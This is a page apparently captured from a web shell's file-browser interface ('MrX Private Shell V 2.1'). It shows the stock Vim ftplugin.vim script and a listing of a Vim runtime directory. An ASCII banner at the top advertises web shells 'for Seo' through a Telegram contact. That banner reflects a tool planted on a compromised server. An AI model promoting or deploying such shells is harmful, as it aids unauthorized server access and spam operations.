__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
vim9script noclear
# Vim support file to switch on loading plugins for file types
#
# Maintainer: The Vim Project <https://github.com/vim/vim>
# Last change: 2023 Aug 10
# Former Maintainer: Bram Moolenaar <Bram@vim.org>
if exists("g:did_load_ftplugin")
finish
endif
g:did_load_ftplugin = 1
augroup filetypeplugin
au FileType * call LoadFTPlugin()
augroup END
if exists('*LoadFTPlugin')
# No need to define the function again.
finish
endif
def LoadFTPlugin()
if exists("b:undo_ftplugin")
# We assume b:undo_ftplugin is using legacy script syntax
legacy exe b:undo_ftplugin
unlet! b:undo_ftplugin b:did_ftplugin
endif
var s = expand("<amatch>")
if s != ""
if &cpo =~# "S" && exists("b:did_ftplugin")
# In compatible mode options are reset to the global values, need to
# set the local values also when a plugin was already used.
unlet b:did_ftplugin
endif
# When there is a dot it is used to separate filetype names. Thus for
# "aaa.bbb" load "aaa" and then "bbb".
for name in split(s, '\.')
exe 'runtime! ftplugin/' .. name .. '.vim ftplugin/' .. name .. '_*.vim ftplugin/' .. name .. '/*.vim'
endfor
endif
enddef
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| autoload | Folder | 0755 |
|
|
| colors | Folder | 0755 |
|
|
| compiler | Folder | 0755 |
|
|
| doc | Folder | 0755 |
|
|
| ftplugin | Folder | 0755 |
|
|
| import | Folder | 0755 |
|
|
| indent | Folder | 0755 |
|
|
| keymap | Folder | 0755 |
|
|
| lang | Folder | 0755 |
|
|
| macros | Folder | 0755 |
|
|
| pack | Folder | 0755 |
|
|
| plugin | Folder | 0755 |
|
|
| Folder | 0755 |
|
||
| spell | Folder | 0755 |
|
|
| syntax | Folder | 0755 |
|
|
| tutor | Folder | 0755 |
|
|
| bugreport.vim | File | 1.95 KB | 0644 |
|
| debian.vim | File | 1.76 KB | 0644 |
|
| defaults.vim | File | 4.74 KB | 0644 |
|
| delmenu.vim | File | 1.25 KB | 0644 |
|
| evim.vim | File | 2.23 KB | 0644 |
|
| filetype.vim | File | 76.64 KB | 0644 |
|
| ftoff.vim | File | 346 B | 0644 |
|
| ftplugin.vim | File | 1.17 KB | 0644 |
|
| ftplugof.vim | File | 419 B | 0644 |
|
| gvimrc_example.vim | File | 1.67 KB | 0644 |
|
| indent.vim | File | 820 B | 0644 |
|
| indoff.vim | File | 348 B | 0644 |
|
| menu.vim | File | 41.16 KB | 0644 |
|
| mswin.vim | File | 3.41 KB | 0644 |
|
| optwin.vim | File | 67.38 KB | 0644 |
|
| scripts.vim | File | 866 B | 0644 |
|
| synmenu.vim | File | 39.39 KB | 0644 |
|
| vimrc_example.vim | File | 1.4 KB | 0644 |
|